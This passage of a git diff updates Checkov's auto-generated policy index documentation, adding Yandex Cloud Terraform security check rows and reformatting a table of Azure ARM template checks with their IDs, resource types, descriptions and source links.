| Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3731 | CKV_YC_1 | resource | yandex_mdb_redis_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3732 | CKV_YC_1 | resource | yandex_mdb_sqlserver_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | +| 3733 | CKV_YC_2 | resource | yandex_compute_instance | Ensure compute instance does not have public IP. | Terraform | [ComputeVMPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMPublicIP.py) | +| 3734 | CKV_YC_3 | resource | yandex_storage_bucket | Ensure storage bucket is encrypted. | Terraform | [ObjectStorageBucketEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketEncryption.py) | +| 3735 | CKV_YC_4 | resource | yandex_compute_instance | Ensure compute instance does not have serial console enabled. | Terraform | [ComputeVMSerialConsole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSerialConsole.py) | +| 3736 | CKV_YC_5 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster does not have public IP address. | Terraform | [K8SPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SPublicIP.py) | +| 3737 | CKV_YC_6 | resource | yandex_kubernetes_node_group | Ensure Kubernetes cluster node group does not have public IP addresses. 
| Terraform | [K8SNodeGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupPublicIP.py) | +| 3738 | CKV_YC_7 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster auto-upgrade is enabled. | Terraform | [K8SAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SAutoUpgrade.py) | +| 3739 | CKV_YC_8 | resource | yandex_kubernetes_node_group | Ensure Kubernetes node group auto-upgrade is enabled. | Terraform | [K8SNodeGroupAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupAutoUpgrade.py) | +| 3740 | CKV_YC_9 | resource | yandex_kms_symmetric_key | Ensure KMS symmetric key is rotated. | Terraform | [KMSSymmetricKeyRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/KMSSymmetricKeyRotation.py) | +| 3741 | CKV_YC_10 | resource | yandex_kubernetes_cluster | Ensure etcd database is encrypted with KMS key. | Terraform | [K8SEtcdKMSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SEtcdKMSEncryption.py) | +| 3742 | CKV_YC_11 | resource | yandex_compute_instance | Ensure security group is assigned to network interface. | Terraform | [ComputeVMSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSecurityGroup.py) | +| 3743 | CKV_YC_12 | resource | yandex_mdb_clickhouse_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3744 | CKV_YC_12 | resource | yandex_mdb_elasticsearch_cluster | Ensure public IP is not assigned to database cluster. 
| Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3745 | CKV_YC_12 | resource | yandex_mdb_greenplum_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3746 | CKV_YC_12 | resource | yandex_mdb_kafka_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3747 | CKV_YC_12 | resource | yandex_mdb_mongodb_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3748 | CKV_YC_12 | resource | yandex_mdb_mysql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3749 | CKV_YC_12 | resource | yandex_mdb_postgresql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3750 | CKV_YC_12 | resource | yandex_mdb_sqlserver_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | +| 3751 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure cloud member does not have elevated access. 
| Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | +| 3752 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_member | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | +| 3753 | CKV_YC_14 | resource | yandex_kubernetes_cluster | Ensure security group is assigned to Kubernetes cluster. | Terraform | [K8SSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SSecurityGroup.py) | +| 3754 | CKV_YC_15 | resource | yandex_kubernetes_node_group | Ensure security group is assigned to Kubernetes node group. | Terraform | [K8SNodeGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupSecurityGroup.py) | +| 3755 | CKV_YC_16 | resource | yandex_kubernetes_cluster | Ensure network policy is assigned to Kubernetes cluster. | Terraform | [K8SNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNetworkPolicy.py) | +| 3756 | CKV_YC_17 | resource | yandex_storage_bucket | Ensure storage bucket does not have public access permissions. | Terraform | [ObjectStorageBucketPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketPublicAccess.py) | +| 3757 | CKV_YC_18 | resource | yandex_compute_instance_group | Ensure compute instance group does not have public IP. 
| Terraform | [ComputeInstanceGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupPublicIP.py) | +| 3758 | CKV_YC_19 | resource | yandex_vpc_security_group | Ensure security group does not contain allow-all rules. | Terraform | [VPCSecurityGroupAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupAllowAll.py) | +| 3759 | CKV_YC_20 | resource | yandex_vpc_security_group_rule | Ensure security group rule is not allow-all. | Terraform | [VPCSecurityGroupRuleAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupRuleAllowAll.py) | +| 3760 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_binding | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | +| 3761 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_member | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | +| 3762 | CKV_YC_22 | resource | yandex_compute_instance_group | Ensure compute instance group has security group assigned. | Terraform | [ComputeInstanceGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupSecurityGroup.py) | +| 3763 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_binding | Ensure folder member does not have elevated access. 
| Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | +| 3764 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_member | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | +| 3765 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 3766 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 3767 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 3768 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. 
| Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 3769 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| 3770 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | --- diff --git a/docs/5.Policy Index/arm.md b/docs/5.Policy Index/arm.md index 3047a744ddc..2b7adc1507d 100644 --- a/docs/5.Policy Index/arm.md +++ b/docs/5.Policy Index/arm.md 
@@ -6,103 +6,129 @@ nav_order: 1 # arm resource scans (auto generated) -| | Id | Type | Entity | Policy | IaC | Resource Link | -|----|---------------|-----------|------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------|-------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| 0 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | arm | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | -| 1 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | arm | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | -| 2 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | arm | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsTransportEncryption.py) | -| 3 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | arm | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | -| 4 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | arm | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | -| 5 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server 
Authorized IP Ranges enabled | arm | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | -| 6 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | arm | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | -| 7 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | arm | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | -| 8 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 9 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 10 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 11 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 12 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | arm | 
[SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | -| 13 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 14 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 15 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 16 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 17 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 18 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 19 | CKV_AZURE_14 | resource | Microsoft.Web/sites | 
Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | arm | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | -| 20 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | arm | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | -| 21 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | arm | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | -| 22 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | arm | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | -| 23 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | arm | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | -| 24 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | arm | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | -| 25 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | arm | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | -| 26 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | 
[SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | -| 27 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | -| 28 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | -| 29 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | -| 30 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | arm | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py) | -| 31 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | arm | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | -| 32 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | arm | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | -| 33 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' 
for MSSQL servers | arm | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | -| 34 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | arm | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | -| 35 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | arm | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | -| 36 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 37 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 38 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 39 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | 
[PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 40 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 41 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 42 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | arm | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | -| 43 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 44 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 45 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for 
blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 46 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | arm | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py) | -| 47 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | arm | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountAzureServicesAccessEnabled.py) | -| 48 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | arm | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | -| 49 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | arm | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | -| 50 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | arm | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | -| 51 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | arm | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | -| 52 | CKV_AZURE_41 | resource | 
Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | arm | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | -| 53 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | arm | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | -| 54 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | arm | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | -| 55 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | arm | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | -| 56 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | arm | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | -| 57 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | arm | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | -| 58 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | arm | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | -| 59 | CKV_AZURE_59 | resource | 
Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | arm | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | -| 60 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | arm | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | -| 61 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | arm | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | -| 62 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | arm | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | -| 63 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | arm | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | -| 64 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | arm | 